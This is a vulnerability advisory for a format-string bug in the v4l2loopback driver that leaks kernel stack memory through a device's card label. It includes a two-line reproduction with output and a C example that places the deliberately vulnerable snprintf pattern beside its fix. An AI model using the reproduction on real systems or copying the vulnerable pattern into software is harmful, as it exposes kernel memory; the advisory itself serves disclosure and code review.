When a new video device is added with v4l2loopback-ctl and its card label contains format string specifiers (e.g. "%p"), the kernel driver uses the label itself as a format string when the device capabilities are queried. The specifiers are expanded inside the kernel, so the resulting device name leaks kernel memory (stack contents) to whoever can read it.
Exploiting the issue requires access to the control device /dev/v4l2loopback, which by default is owned by root:root with mode 0600 (chmod 600). The attack still works against kernels running in lockdown mode, so lockdown does not mitigate the leak.
Reproduction (as a user with access to /dev/v4l2loopback):
v4l2loopback-ctl add -n "%p-%p-%p"
cat /sys/devices/virtual/video4linux/video2/name
Output (example; the first line is printed by v4l2loopback-ctl add, the second by cat):
/dev/video2
00000000de899e9f-00000000f6d35a
Expected:
/dev/video2
%p-%p-%p
The leaked output stops after 31 characters, the capacity of the driver's fixed-size device name buffer, which is why the second pointer is cut short and the third is missing entirely. The values shown have the zero-padded shape of the kernel's hashed %p output; specifiers such as %lx expand the raw stack words instead.
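The bug pattern behind this advisory is a user-controlled string passed as the format argument of snprintf instead of as data. The following is an added example, not code from v4l2loopback or its author: it reproduces that pattern in user space next to the one-line fix, and shows the 31-character truncation seen in the output above. CARD_NAME_LEN is an assumption standing in for the driver's fixed-size name buffer (32 bytes including the NUL); the function names and sample labels are illustrative and constructed here.

```c
/*
 * Added example, not v4l2loopback code: the format-string bug pattern
 * from the advisory, reproduced in user space beside the fix.
 * CARD_NAME_LEN is an assumption mirroring the driver's 32-byte name buffer.
 */
#include <stdio.h>
#include <string.h>

#define CARD_NAME_LEN 32

/*
 * Vulnerable pattern: the attacker-controlled label *is* the format
 * string, so a label such as "%p-%p-%p" makes snprintf pull values that
 * were never passed (spilled registers / stack) into the name buffer.
 * In the kernel this exposes kernel stack words; in this user-space
 * reproduction it exposes whatever glibc's va_arg lands on. The pragmas
 * only silence the warning the compiler rightly emits for this call.
 */
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wformat-security"
#pragma GCC diagnostic ignored "-Wformat-nonliteral"
static void set_name_vulnerable(char *name, size_t len, const char *label)
{
    snprintf(name, len, label);
}
#pragma GCC diagnostic pop

/* Hardened: the label is an argument to a literal "%s", so '%' is just a byte. */
static void set_name_fixed(char *name, size_t len, const char *label)
{
    snprintf(name, len, "%s", label);
}

/*
 * Returns 1 if the stored name equals the label (up to the 31 usable
 * characters of the buffer), 0 if format expansion changed it.
 */
int label_preserved(const char *label, int hardened)
{
    char name[CARD_NAME_LEN];

    if (hardened)
        set_name_fixed(name, sizeof(name), label);
    else
        set_name_vulnerable(name, sizeof(name), label);

    return strncmp(name, label, CARD_NAME_LEN - 1) == 0;
}

/* Length of the stored name after the fix: demonstrates the 31-character cut. */
size_t fixed_name_len(const char *label)
{
    char name[CARD_NAME_LEN];

    set_name_fixed(name, sizeof(name), label);
    return strlen(name);
}

int main(void)
{
    const char *label = "%p-%p-%p";   /* constructed: the label used in the advisory */
    char name[CARD_NAME_LEN];

    set_name_vulnerable(name, sizeof(name), label);
    printf("vulnerable: %s\n", name);  /* expanded pointer values, not the label */
    set_name_fixed(name, sizeof(name), label);
    printf("fixed:      %s\n", name);  /* the literal label, %p-%p-%p */
    printf("40-char label stored as %zu chars\n",
           fixed_name_len("0123456789012345678901234567890123456789"));
    return 0;
}
```

The vulnerable function is what a grep for snprintf(..., label) or sprintf(..., label) should turn up in a code review; the fix is mechanical, and the same applies to any kernel helper that takes a format string (pr_info, dev_err, seq_printf). In user space, "%p" prints raw addresses, whereas the kernel hashes them, which is why the advisory's sample output looks different from what this program prints.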